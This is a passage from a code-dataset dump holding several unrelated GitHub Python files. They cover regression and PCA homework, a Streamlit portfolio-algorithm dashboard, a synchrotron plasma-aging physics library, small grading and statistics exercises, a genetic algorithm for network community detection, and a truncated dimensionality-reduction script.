np\nimport os\n\nos.chdir(u'D:\\DataguruPyhton\\DataAnalysis\\diLesson15')\ndf = pd.read_table('ex15.txt', sep='\\s+', parse_dates=True, encoding='gb2312')\ny = df['y']\nx = (df.iloc[:, 0:3])\n\nx.corr()\n\n####多元线性回归分析####\nlinreg = LinearRegression()\nlinreg.fit(x, y)\nprint(linreg.intercept_)\n# 运行结果:-10.127988155231051\nprint(linreg.coef_)\n# 运行结果:[-0.05139616 0.58694904 0.28684868]\ny_pred = linreg.predict(x)\n# 误差评估\nprint(\"多元线性回归分析的MAE:\", metrics.mean_absolute_error(y, y_pred))\n# 运行结果:多元线性回归分析的MAE: 0.3233899552716768\nprint(\"多元线性回归分析的MSE:\", metrics.mean_squared_error(y, y_pred))\n# 运行结果:多元线性回归分析的MSE: 0.15208631466626785\nprint(\"多元线性回归分析的RMSE:\", np.sqrt(metrics.mean_squared_error(y, y_pred)))\n# 运行结果:多元线性回归分析的RMSE: 0.38998245430566214\nprint(\"多元线性回归分析的得分\", linreg.score(x, y))\n# 运行结果:多元线性回归分析的得分 0.9918965520557045\n\n####主成分分析####\npca = PCA()\npca.fit(x)\nprint(pca.explained_variance_ratio_) # 主成分为1个\n\npac = PCA(n_components=1)\nreduced_x = pac.fit_transform(x)\n\nlinreg2 = LinearRegression()\nlinreg2.fit(reduced_x, y)\nprint(linreg2.intercept_)\n# 运行结果:[0.99676249 0.00209367 0.00114384]\nprint(linreg2.coef_)\n# 运行结果:21.89090909090909\ny_pred2 = linreg2.predict(reduced_x)\n# 误差评估\n\nprint(\"主成分分析的MAE:\", metrics.mean_absolute_error(y, y_pred2))\n# 运行结果:主成分分析的MAE: 0.8936859420929342\nprint(\"主成分分析的MSE:\", metrics.mean_squared_error(y, y_pred2))\n# 运行结果:主成分分析的MSE: 1.182503150421625\nprint(\"主成分分析的RMSE:\", np.sqrt(metrics.mean_squared_error(y, y_pred2)))\n# 运行结果:主成分分析的RMSE: 1.087429607111019\nprint(\"主成分分析的得分:\", linreg2.score(reduced_x, y))\n# 运行结果:主成分分析的得分: 0.9369939843408384\n\n#####画图#####\n# 作图,比较实际值y,多元线性回归模型预测值y_pred,主成分分析模型的预测值y_pred2进行比较,直观展现模型的准确度\nk = range(1, 12)\nplt.scatter(k, y, c='r', marker='x')\nplt.scatter(k, y_pred, c='b', marker='D')\nplt.scatter(k, y_pred2, c='g', marker='.')\nplt.show()\n","repo_name":"jt1024/DataAnalysis","sub_path":"diLesson15/homework15.py","file_name":"homework15.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31840993530","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nfrom universal import tools, algos\nfrom universal.algos import *\n\ndef app():\n ### Create Title\n st.title(\"Summarize\")\n ### Add a picture\n st.header('Paramètres de prédiction')\n st.markdown('### Choix du modèle et optimisation')\n st.write(\"Dans un premier temps, nous avons fait fonctionner la totalité des algorithmes disponibles par périodes.\")\n st.write(\"Puis, nous avons dressé un tableau, résumant pour chaque algorithme les métriques calculées (ratio de Sharpe et rendement cumulatif) :\")\n st.write(\"Nous avons remarqué que l’algorithme Best_Markowitz et BCRP avait tendance à surperformer les autres.\") \n\n\n Scenar_crypto_path = ['assets/cryptos/année_2018_DF.csv', 'assets/cryptos/année_2018_flat_DF.csv','assets/cryptos/année_2019_flat_DF.csv','assets/cryptos/année_2021_Nov_DF.csv',\n 'assets/cryptos/année_2021_Oct_DF.csv', 'assets/cryptos/covid_DF.csv', 'assets/cryptos/ukr_war_DF.csv']\n Scenar_nasdaq_path = ['assets/nasdaq/année_2018_DF.csv', 'assets/nasdaq/année_2018_flat_DF.csv','assets/nasdaq/année_2019_flat_DF.csv','assets/nasdaq/année_2021_Nov_DF.csv', 'assets/nasdaq/année_2021_Oct_DF.csv',\n 'assets/nasdaq/covid_DF.csv', 'assets/nasdaq/new_millennium_DF.csv', 'assets/nasdaq/subprimes_DF.csv', 'assets/nasdaq/ukr_war_DF.csv']\n\n Scenar_crypto = ['année_2018_DF', 
'année_2018_flat_DF','année_2019_flat_DF','année_2021_Nov_DF', 'année_2021_Oct_DF',\n 'covid_DF', 'ukr_war_DF']\n Scenar_nasdaq = ['année_2018_DF', 'année_2018_flat_DF','année_2019_flat_DF','année_2021_Nov_DF', 'année_2021_Oct_DF',\n 'covid_DF', 'new_millennium_DF', 'subprimes_DF', 'ukr_war_DF']\n\n\n\n algorithmes = [ algos.Anticor(), algos.BAH(), algos.BCRP(), algos.BestMarkowitz(), algos.BestSoFar(), algos.BNN(),\n algos.CORN(), algos.CRP(), algos.CWMR(), algos.DynamicCRP(), algos.EG(), algos.OLMAR(), algos.ONS(),\n algos.PAMR(), algos.RMR()]\n noms_algos = ['Anticor', 'BAH', 'BCRP', 'BestMarkowitz', 'BestSoFar', 'BNN', 'CORN', 'CRP', 'CWMR', 'DynamicCRP',\n 'EG', 'OLMAR', 'ONS', 'PAMR', 'RMR']\n metric_name = ['Ratio de Sharpe', 'beta']\n #Mesure de performance\n def perform(result):\n return result.sharpe , result.alpha_beta()[1]\n\n market_list = [\"Crypto\", \"Nasdaq\"]\n market = st.radio(\"Sélectionnez le marché souhaité\", market_list)\n if market == market_list[0]:\n mrkt = \"cryptos\"\n senari_list = [\"covid (date : 2019-11-11)\", \"ukr_war (date : 2022-02-24)\", \"année_2018 (date : 2017-12-1)\", \"année_2018_flat (date : 2018-09-01)\", \"année_2019_flat (date : 2019-1-1)\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1 (date : 2020-02-01)\", \"random2 (date : 2020-05-23)\", \"random3 (date : 2020-09-01)\"]\n elif market == market_list[1]:\n mrkt = \"nasdaq\"\n senari_list = [\"covid (date : 2019-11-11)\", \"ukr_war (date : 2022-02-24)\", \"année_2018 (date : 2017-12-1)\", \"année_2018_flat (date : 2018-09-01)\", \"année_2019_flat (date : 2019-1-1)\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1 (date : 2020-02-01)\", \"random2 (date : 2020-05-23)\", \"random3 (date : 2020-09-01)\", \"subprimes_DF (date : 2007-11-01)\", \"new_millennium_DF (date : 1999-06-06)\"]\n senar = st.selectbox(\"Selectionnez le scénario souhaité\", senari_list)\n\n if senar == senari_list[0]:\n snr = \"covid_DF\"\n elif senar == senari_list[1]:\n snr = \"ukr_war_DF\"\n elif senar == senari_list[2]:\n snr = \"année_2018_DF\"\n elif senar == senari_list[3]:\n snr = \"année_2018_flat_DF\"\n elif senar == senari_list[4]:\n snr = \"année_2019_flat_DF\"\n elif senar == senari_list[5]:\n snr = \"année_2021_Nov_DF\"\n elif senar == senari_list[6]:\n snr = \"année_2021_Oct_DF\"\n elif senar == senari_list[7]:\n snr = \"rdm1_DF\"\n elif senar == senari_list[8]:\n snr = \"rdm2_DF\"\n elif senar == senari_list[9]:\n snr = 'rdm3_DF'\n elif senar == senari_list[10]:\n snr = 'subprimes_DF'\n else:\n snr = 'new_millennium_DF'\n sharp = []\n metrics = []\n # nettoyage des données\n\n # Création et affichage dataframes\n st.write('************ ' + snr + ' **********') # je charge le premier\n #X = pd.DataFrame(data=np.array(metrics), columns=metric_name, index=noms_algos)\n #Y = X.sort_values(by='Ratio de Sharpe', ascending=False)\n #Y = Y[Y['Ratio de Sharpe'] > 1].head(4)\n \n\n X = pd.read_csv(f\"./data_csv/{mrkt}/summary_table_{snr}.csv\", index_col= 0)\n Y = X.sort_values(by='Ratio de Sharpe', ascending=False)\n Y = Y[Y['Ratio de Sharpe'] > 1].head(4)\n \n\n #X.to_csv(f\"./data_csv/{mrkt}/summary_table_{snr}.csv\")\n st.write(X)\n\n #Affichage meilleurs algos\n st.write('===========>>>>> ' + 'Meilleures performances pour : ', list(Y.index))\n\"\"\" def summaries(scenari, nom):\n for a,b in zip(scenari, nom):\n summary_table(a,b)\n summaries(f\"{mrkt}/{snr}.csv\", snr)\"\"\"\n #summaries(Scenar_nasdaq_path[1], 
Scenar_nasdaq[1])\n","repo_name":"Drosophobe/pyCrypto","sub_path":"src/StreamLitpyCrypto/tab3.py","file_name":"tab3.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13059593755","text":"#!/usr/bin/env python\n\n# Simple lib to estimate plasma aging - Henrik Edler, 2022\n\nimport multiprocessing as mp\nimport astropy.units as u\nfrom scipy import special, integrate, interpolate\nimport logging as log\nimport numpy as np\nimport warnings\n# Some strange behavior of the integrand raises annoying warnings - mute them for now...\nwarnings.filterwarnings('ignore', category=integrate.IntegrationWarning, append=True)\n\n### Define constants\n### Throughout this script, SI units are used!!\nc = 299792458.0 # m/s\nm_e = 9.1093837015e-31 # kg\nsigma_T = 6.6524587321e-29 # m2\nmu0 = 1.25663706212e-06 # N A-2\ne = 1.602176634e-19 # Coulomb\neps0 = 8.8541878128e-12 # F/m\nU_cmb = 4.19e-14 # J m-3 CMB energy density at z=0\n\ndef nu_c(E, B, alpha):\n \"\"\"\n Critical frequency for synchrotron\n Parameters\n ----------\n E: float, energy in SI\n B\n alpha\n\n Returns\n -------\n\n \"\"\"\n # Critical frequency\n return (3*(E / (c ** 2 * m_e)) ** 2 * e * B * np.sin(alpha) / (4 * np.pi * m_e)) # Hardcastle and Longair 3/4, Hardwood 6/4...\n\ndef F_accurate(x):\n # numerical integral defining F(x). Use this to calculate lookup-table.\n return x*integrate.quad(lambda z: special.kv(5./3., z), x, np.inf, epsrel=1.e-5, limit=2000)[0]\n\ndef create_F_lookup():\n xvals = np.logspace(-4,1.4,1000)\n with mp.Pool() as p:\n results = p.map(F_accurate, xvals)\n np.save(__file__.replace('lib_aging.py','')+'lib_aging_data/F(X)_lookup.npy', np.array([xvals, results]))\n\ndef n_e(E, iidx, B, t, z):\n \"\"\"\n Electron density taking into account Jaffe-Perola + IC losses\n Parameters\n ----------\n E: float, energy in J\n iidx: float, spectral index\n B: float, magnetic field in Tesla\n t: float, age in s\n z: float, redshift z\n\n Returns\n -------\n electron density, float\n \"\"\"\n # C = B**2*(4*sigma_T/(6*m_e**2*c**3*mu0))\n beta = E*t*(B**2/(2*mu0) + U_cmb*(1+z)**4)*(4*sigma_T/(3*m_e**2*c**3)) # Harwood 2013 has nu_c**3 instead of c. But this can't be right?\n # slightly confusing with exponent indices here since different sign conventions exist...\n if beta >= 1:\n return 0.\n else:\n return E ** (-2 * iidx - 1) * ((1 - beta) ** ((2 * iidx + 1) - 2))\n\n# def n_e_fermi2_steady_state(E, B, q, D_0, z, C_i=0):\n# \"\"\"\n# Electron density taking into account Synch. 
+ IC losses and 2nd order fermit accelleration.\n# Underlying assumption is a power-law energy dependency of the acceleration time -> t_acc = t_0 * p^k\n# Steady state solution.\n# https://www.science.org/action/downloadSupplement?doi=10.1126%2Fsciadv.1701634&file=1701634_sm.pdf\n# Parameters\n# ----------\n# E: float, energy in J\n# B: float, magnetic field in Tesla\n# t_0: float, acceleration timescale normalization\n# k: float, exponent of acceleration time\n# z: float, redshift z\n#\n# Returns\n# -------\n# electron density, float\n# \"\"\"\n# p = c**-1 * (E**2 - m_e**2 * c**4)**0.5 # probably E \\approx pc would be fine\n# C = (4*sigma_T * (3.2e-10)**2 )/ (3 * m_e**2 * c**3 * mu0)\n# F = 4.8e-4 * ((B / (3.2e-10))**2 + (1+z)**4)\n# C_i = 0 # integration constant\n#\n# k = 3 - q\n# mp.dps = 15\n# #print((k-4)/k, -(F*p**k)/(D_0*k), np.complex(mpmath.gammainc((k-4)/k, -(F*p**k)/(D_0*k))))\n# sum1 = (1/F)*(-F/(D_0*k))**(4/k)*np.complex(mpmath.gammainc((k-4)/k, -(F*p**k)/(D_0*k))).real\n# sum2 = C_i/D_0\n# mul = - p**2 * np.exp((-F*p**k)/(D_0*k))\n# #print(sum1, sum2, mul, -F*p**k/(D_0*k))\n# res = mul * (sum1 + sum2)\n# if res < 0:\n# return 0\n# else:\n# return res\n\n# def n_e_fermi2_steady_state2(E, B, q, D_0, z):\n# \"\"\"\n# Electron density taking into account Synch. + IC losses and 2nd order fermit accelleration.\n# Underlying assumption is a power-law energy dependency of the acceleration time -> t_acc = t_0 * p^k\n# Steady state solution ignoring the integration constant in the ODE.\n# See also Stawarz et al. 2008.\n#\n# Parameters\n# ----------\n# E: float, energy in J\n# B: float, magnetic field in Tesla\n# q: float, spectral index of turbulence. 5/3 is Kolmogorov case, 2 is hard-sphere\n# D_0: float, reacceleration coefficient\n# z: float, redshift z\n#\n# Returns\n# -------\n# electron density, float\n# \"\"\"\n# # p = c**-1 * (E**2 - m_e**2 * c**4)**0.5 # probably E \\approx pc would be fine\n# p = E\n# C = (4*sigma_T * (3.2e-10)**2 )/ (3 * m_e**2 * c**3 * mu0)\n# F = 4.8e-4 * ((B / (3.2e-10))**2 + (1+z)**4)\n# F = C * ((B / (3.2e-10))**2 + (1+z)**4)\n# # print(-F*p**(3-q)/(D_0*(3-q)))\n# return p**2 * np.exp((-F*p**(3-q))/(D_0*(3-q)))\n\n\nclass S_model():\n # TODO: move everything to log-space!\n # TODO: take into account upper limits?\n\n def __init__(self, epsrel=1.e-3):\n # use lookup table for F(x)\n with open(__file__.replace('lib_aging.py', '') + 'lib_aging_data/F(X)_lookup.npy', 'rb') as f:\n xF_dat = np.load(f)\n self.F_interp = interpolate.InterpolatedUnivariateSpline(xF_dat[0], xF_dat[1], ext=0, check_finite=False)\n self.epsrel = epsrel\n\n def evaluate(self, nu, B, iidx, t, z, N0=1.):\n \"\"\"\n Synchrotron flux density including basic Jaffe-Perola aging.\n Parameters\n ----------\n nu: float or numpy array\n Frequency in Hertz\n B: float\n B in Tesla\n iidx: float\n Injection index, positive definition\n t: float, or numpy array\n Age in Myrs\n N0: float,\n Normaliation factor, optional.\n\n Returns\n -------\n flux density: float or numpy array\n Arbitrary units\n \"\"\"\n t *= 1e6*3.154e7 # Myrs to seconds\n nu = nu*(1+z) # redshift frequency\n C0 = (z+1)**-2*N0*3**0.5*e**3*B/(8*np.pi*eps0*c*m_e)\n E_min, E_max = 0.5e6*1.60218e-19, 1.e11*1.60218e-19 # eV, TODO: units...\n\n def integrand(logE, alpha):\n \"\"\"\n Integrand to call\n Parameters\n ----------\n E: float, energy in J\n alpha: float, impact angle\n \"\"\"\n try:\n logE = logE[:,np.newaxis]\n alpha = alpha[np.newaxis]\n result = np.log(10) * 10**logE * 
self.F(nu/nu_c(10**logE,B,alpha))*0.5*np.sin(alpha)**2*n_e(10**logE, iidx, B, t, z)\n result[np.isnan(result)] = 0.0 # case zero times infinity\n return result\n except (IndexError, TypeError) as e:\n if alpha == 0.:\n return 0.\n else:\n return np.log(10) * 10**logE * self.F(nu/nu_c(10**logE,B,alpha))*0.5*np.sin(alpha)**2*n_e(10**logE, iidx, B, t, z)\n\n res_quad = C0 * integrate.dblquad(integrand, 1e-4, np.pi, np.log10(E_min), np.log10(E_max), epsrel=self.epsrel)[0] # rough integration\n # TODO check order of integration borders\n # res_quad = C0 * integrate.dblquad(integrand, 1e-4, np.pi, np.log10(E_min), np.log10(E_max), epsrel=self.epsrel)[0] # rough integration\n return res_quad\n\n def evaluate_fermi2_steady_state(self, nu, B, z, q, D_0, N0=1.):\n \"\"\"\n Synchrotron flux density including Jaffe-Perola model, synch. and IC aging as well as 2nd order fermi acceleration.\n Parameters\n ----------\n nu: float or numpy array\n Frequency in Hertz\n B: float\n B in Tesla\n z: float, redshift\n t_acc: float\n acceleration timescale in Myrs\n N0: float,\n Normaliation factor, optional.\n\n Returns\n -------\n flux density: float or numpy array\n Arbitrary units\n \"\"\"\n # t_acc *= 1e6*3.154e7 # Myrs to seconds\n nu = nu*(1+z) # redshift frequency\n C0 = (z+1)**-2*N0*3**0.5*e**3*B/(8*np.pi*eps0*c*m_e)\n E_min, E_max = 0.5e6*1.60218e-19, 1.e10*1.60218e-19 # eV, TODO: units...\n\n def integrand(E, alpha):\n \"\"\"\n Integrand to call\n Parameters\n ----------\n E: float, energy in J\n alpha: float, impact angle\n \"\"\"\n return self.F(nu/nu_c(E,B,alpha))*0.5*np.sin(alpha)**2*n_e_fermi2_steady_state2(E, B, q, D_0, z)\n\n return C0*integrate.dblquad(integrand, 0, np.pi, E_min, E_max, epsrel=self.epsrel)[0] # rough integration\n\n def F(self, x):\n return np.vectorize(self._F)(x)\n\n def _F(self, x):\n # F(x): Use asymptotes below and above, in between interpolate lookup table\n # Mourad Fouka1and Saad Ouichaoui, 2013\n if x > 25:\n return np.sqrt(np.pi*x/2)*np.exp(-x)\n elif x < 1e-4:\n return np.pi*2**(5/3)/(special.gamma(1/3)*np.sqrt(3))*x**(1/3)\n else:\n return self.F_interp(x)\n\n\ndef get_si(nu1, nu2, S1, S2):\n return np.log(S1 / S2) / np.log(nu1 / nu2)\n\n\ndef get_aging_si(nu1, nu2, B, injection_index, times, z, model=None):\n \"\"\"\n Return the Jaffe-Perola aging path in a color-color plot.\n Parameters\n ----------\n nu1: float\n lower spectral index HERTZ.\n nu2: list of two floats\n upper spectral index HERTZ.\n B: float\n Magnetic field in Tesla\n injection_index: float\n injection spectral index (positive definition)\n times: array of floats\n times at which to evaluate the SI in Myr\n z: float\n Redshift\n Returns\n -------\n si: array, sequence of the spectral indices at different times\n \"\"\"\n try:\n times[0]\n except IndexError:\n times = [times]\n S_array = np.zeros((len(times), 2))\n if model is None:\n model = S_model()\n for i, t in enumerate(times):\n S_array[i,0] = model.evaluate(nu1, B, injection_index, t, z)\n S_array[i,1] = model.evaluate(nu2, B, injection_index, t, z)\n si = get_si(nu1, nu2, S_array[:,0], S_array[:,1])\n return si\n\ndef get_aging_si_steady_state(nu1, nu2, B, q, D_0, z, model=None):\n \"\"\"\n Return the Jaffe-Perola aging path in a color-color plot.\n Parameters\n ----------\n nu1: float\n lower spectral index HERTZ.\n nu2: list of two floats\n upper spectral index HERTZ.\n B: float\n Magnetic field in Tesla\n q: float\n spectral index of momentum space diffusion coefficient\n D_0: float\n reacceleration factor\n z: float\n Redshift\n 
Returns\n -------\n si: array, sequence of the spectral indices for each D_0 value\n \"\"\"\n try:\n D_0[0]\n except IndexError:\n D_0 = [D_0]\n S_array = np.zeros((len(D_0), 2))\n if model is None:\n model = S_model()\n for i, t in enumerate(D_0):\n # pass the current D_0 value (the loop variable t), not the whole list\n S_array[i,0] = model.evaluate_fermi2_steady_state(nu1, B, z, q, t)\n S_array[i,1] = model.evaluate_fermi2_steady_state(nu2, B, z, q, t)\n si = get_si(nu1, nu2, S_array[:,0], S_array[:,1])\n return si\n\n\ndef get_model_si_vs_B(nu1, nu2, B_range, injection_index, z, t):\n \"\"\"\n Return the spectral index as a function of the magnetic field strength.\n Parameters\n ----------\n nu1: float\n lower spectral index HERTZ.\n nu2: list of two floats\n upper spectral index HERTZ.\n B_range: list of len 2, [lower, upper]\n Magnetic field in Tesla\n injection_index: float\n injection spectral index (positive definition)\n z: float\n Redshift\n t: float\n time at which to evaluate the SI in Myr\n Returns\n -------\n si: array, sequence of the spectral indices at different field strengths\n \"\"\"\n S_array = np.zeros((len(B_range), 2))\n # S_model is a class: instantiate it once and call evaluate(), as in get_aging_si()\n model = S_model()\n for i, B in enumerate(B_range):\n S_array[i,0] = model.evaluate(nu1, B, injection_index, t, z)\n S_array[i,1] = model.evaluate(nu2, B, injection_index, t, z)\n si = get_si(nu1, nu2, S_array[:,0], S_array[:,1])\n return si\n\ndef characteristic_lifetime(nu, B, z):\n \"\"\"\n Characteristic lifetime of electrons observed at frequency nu\n Taken from van Weeren 2019 review paper\n\n Parameters\n ----------\n nu: float, freq in Hz\n B: float, B in Tesla\n z: float, redshift\n\n Returns\n -------\n t_age: float, characteristic lifetime in Myr\n \"\"\"\n log.error('not fully implemented check RAiSE III: 3C radio AGN energetics and composition to fix ')\n B_cmb = 3.18e-10 * (1+z)**2\n nu_b = 4*np.pi*m_e**3*c**4 / (3*e*E**2*B*np.sin(alpha))\n v = np.sqrt(243*np.pi*m_e**5*c**2/(4*mu0**2*e**7))\n return nu*(B/(nu_b*(1+z)))**0.5 / (B**2 + B_cmb**2)\n # return 3.2e10*(B**0.5 / (B**2+(B_cmb*(1+z)**2)**2))*((1+z)*nu)**-0.5*1e-6\n\ndef plot_S_model():\n # Debug plotting\n B = 5e-10\n nu_range = np.logspace(np.log10(30e6), 9, 6)\n age_range = np.linspace(0, 200, 5)\n\n from agnpy.emission_regions import Blob\n from agnpy.synchrotron import Synchrotron\n blob = Blob(z=0.001, B = 10**4*B*u.gauss, spectrum_dict = {\"type\": \"PowerLaw\", \"parameters\": {\"p\": 2.3,\"gamma_min\": 2,\"gamma_max\": 1e7}})\n synch = Synchrotron(blob)\n sed = synch.sed_flux(nu_range*u.Hz)\n sed = sed.value / nu_range\n\n model = S_model()\n results = np.zeros((len(age_range), len(nu_range)))\n for i, age in enumerate(age_range):\n with mp.Pool() as p:\n # evaluate(nu, B, iidx, t, z); z=0.001 assumed here to match the Blob above\n results[i] = p.starmap(model.evaluate, [[nu, B, 0.65, age, 0.001] for nu in nu_range])\n print(results[i], nu_range)\n\n PL = (nu_range**-0.65)\n PL /= (PL[0]/sed[0])\n print((results[0,0]/sed[0]))\n results /= (results[0,0]/sed[0])\n\n import matplotlib.pyplot as plt\n plt.close()\n print(nu_range, sed)\n plt.plot(nu_range, sed, c='k', label=f'AGNPY for 0 Myr; B = {B}T')\n plt.plot(nu_range, PL, label=f'PL alpha = 0.65', c='k', ls='dotted')\n for age, res in zip(age_range, results):\n plt.plot(nu_range, res, label=f'{age}Myr; B = {B}T')\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel('frequency [Hz]')\n plt.ylabel('S')\n # plt.xlim([np.min(nu_range), np.max(nu_range)])\n # plt.ylim([np.min(res), 1.05*np.max(res)])\n plt.legend()\n 
plt.savefig(__file__.replace('lib_aging.py','')+'lib_aging_data/synch_vs_nu.png')\n\n","repo_name":"revoltek/scripts","sub_path":"lib_aging.py","file_name":"lib_aging.py","file_ext":"py","file_size_in_byte":14020,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"}
{"seq_id":"19555308980","text":"maths=int(input(\"Enter Maths marks\"))\nphysics=int(input(\"Enter Physics marks\"))\nchemistry=int(input(\"Enter Chemistry marks\"))\n\n# fail if any single subject is below the pass mark of 35\nif(maths<35 or physics<35 or chemistry<35):\n print(\"He failed\")\nelse:\n # average over the 3 subjects (each out of 100)\n average=(maths+physics+chemistry)/3\n if(average>=69):\n print(\"You got A grade\")\n elif(average<=69 and average>=59):\n print(\"You got B grade\")\n else:\n print(\"You got C grade\")","repo_name":"himani1213/SpringMicroservices","sub_path":"New Workspace/BasicPrograms/subjects.py","file_name":"subjects.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"27498991958","text":"import sys\n\nsys.stdin = open('input.txt')\n\nN = int(input())\nnums = []\nnums_dict = {}\nfor _ in range(N):\n n = int(input())\n nums.append(n)\n if n in nums_dict:\n nums_dict[n] += 1\n else:\n nums_dict[n] = 1\nnums.sort()\nmost = []\nm = 0\nfor k, v in nums_dict.items():\n if v > m:\n m = v\n most = []\n most.append(k)\n elif v == m:\n most.append(k)\nprint(int(round(sum(nums)/N,0)))\nprint(nums[N//2])\nif len(most) > 1:\n most.sort()\n print(most[1])\nelse:\n print(most[0])\nprint(nums[-1] - nums[0])\n","repo_name":"khjeon5328/today_algorithm","sub_path":"2020/2020.12월/22/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"70692532674","text":"import warnings\nfrom collections import Counter\nimport networkx as nx\nimport networkx.algorithms.community as nx_comm\nfrom random import seed\n\nfrom lab3.GA import GA\nfrom lab3.chromosome import Chromosome\n\n\ndef readGML(fileName):\n g = nx.read_gml(fileName, label=None)\n mat = nx.to_numpy_array(g)\n net = {'noNodes': g.number_of_nodes(), 'edges': g.number_of_edges(), 'mat': mat}\n\n degrees = []\n noEdges = 0\n for i in range(0, net['noNodes']):\n d = 0\n for j in range(0, net['noNodes']):\n if mat.item((i, j)) == 1:\n d += 1\n if j > i:\n noEdges += mat.item((i, j))\n degrees.append(d)\n net['degrees'] = degrees\n return net\n\n\nparam = readGML('data/dolphins/dolphins.gml')\n# param = readGML('data/football/football.gml')\n# param = readGML('data/karate/karate.gml')\n# param = readGML('data/krebs/krebs.gml')\n# param = readGML('data/adjnoun/adjnoun.gml')\n# param = readGML('data/lesmis/lesmis.gml')\n# param = readGML('data/netscience/netscience.gml')\n\nMIN = 0\nMAX = param['noNodes']\n\n\ndef modularity(communities):\n noNodes = param['noNodes']\n mat = param['mat']\n degrees = param['degrees']\n m = param['edges']\n q = 0.0\n for i in range(0, noNodes):\n for j in range(0, noNodes):\n if communities[i] == communities[j]:\n q += (mat[i][j] - degrees[i] * degrees[j] / m)\n return abs(q * (1 / m))\n\n\ndef solveGA():\n generations = []\n\n seed(1)\n\n gaParam = {'popSize': 100, 'noGen': 1000}\n problParam = {'min': MIN, 'max': MAX, 'function': modularity, 'noNodes': MAX}\n\n ga = GA(gaParam, problParam)\n ga.initialistion()\n ga.eval()\n\n allComms = []\n allFitnesses = []\n\n bestestComs = 0\n bestestChromosome = Chromosome(problParam)\n bestestChromosome.fitness = 0\n 
bestestRepr = []\n\n for g in range(gaParam['noGen']):\n generations.append(g)\n\n bestChromosome = ga.bestChromosome()\n\n communities_dict = {}\n for i in range(len(bestChromosome.repres)):\n if bestChromosome.repres[i] in communities_dict:\n communities_dict[bestChromosome.repres[i]].append(i)\n else:\n communities_dict[bestChromosome.repres[i]] = [i]\n\n allComms.append(len(communities_dict))\n allFitnesses.append(bestChromosome.fitness)\n\n if bestestChromosome.fitness < bestChromosome.fitness:\n bestestChromosome = bestChromosome\n bestestRepr = bestChromosome.repres\n bestestComs = len(communities_dict)\n\n ga.oneGeneration()\n # ga.oneGenerationElitism()\n # ga.oneGenerationSteadyState()\n\n print('Generation: ' + str(g) + ' communities: ' + str(\n len(Counter(bestChromosome.repres).items())) + ' best solution in generation = ' + str(\n bestChromosome.repres) + ' fitness = ' + str(bestChromosome.fitness))\n\n print(\"Best chromosome fitness: \", bestestChromosome.fitness)\n\n print(\"Fitness evolution of the best chromosome: \")\n print(allFitnesses)\n\n print(\"Communities for the best chromosome: \" + str(bestestComs))\n\n print(\"Community evolution: \")\n print(allComms)\n\n print('Index communities for the best chromosome: ')\n for i in range(0, len(bestestRepr)):\n print(str(i) + \": \" + str(bestestRepr[i]))\n\n\nif __name__ == \"__main__\":\n solveGA()\n warnings.simplefilter('ignore')\n","repo_name":"andrei45635/AI","sub_path":"lab3/laborator3.py","file_name":"laborator3.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585370201","text":"import numpy as np\r\n\r\n\r\ndef calc_area(rhs):\r\n res = rhs[-1][0] ** 2\r\n for r, h in rhs:\r\n res += 2 * h * r\r\n return res\r\n\r\n\r\ndef find_min(rhs, mp):\r\n mm, idx = 0, -1\r\n for i in range(len(rhs) - 1):\r\n tmp = mp - 2 * rhs[i][0] * rhs[i][1]\r\n if tmp > mm:\r\n mm, idx = tmp, i\r\n r, h = rhs[-1]\r\n tmp = mp - 2 * h * r - (r**2 - rhs[-2][0]**2)\r\n if tmp > mm:\r\n mm, idx = tmp, len(rhs) - 1\r\n return mm, idx\r\n\r\n\r\ndef main():\r\n t = int(input())\r\n for case in range(1, t + 1):\r\n n, k = map(int, input().split())\r\n rhs = []\r\n for _ in range(n):\r\n r, h = map(int, input().split())\r\n rhs += [(r, h)]\r\n rhs = sorted(rhs)\r\n mp = calc_area(rhs)\r\n\r\n for _ in range(n - k):\r\n mm, idx = find_min(rhs, mp)\r\n rhs.pop(idx)\r\n mp = mm\r\n\r\n print('Case #{}: {}'.format(case, mp * np.pi))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/168.py","file_name":"168.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35368915141","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import MDS\nfrom sklearn.manifold import TSNE\nimport numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser(description='dimensionality reduction with fashion mnist')\nparser.add_argument('--method', default='pca', help='pca/mds/tsne')\n\ndef PCA_(test_data):\n\n\t#apply PCA to the testing data\n\tpca = PCA(n_components=2)\n\tpca.fit(test_data)\n\ttest_data = pca.transform(test_data)\n\n\treturn test_data\n\ndef MDS_(test_data):\n\n\tmds = MDS(n_components=2)\n\ttest_data = 
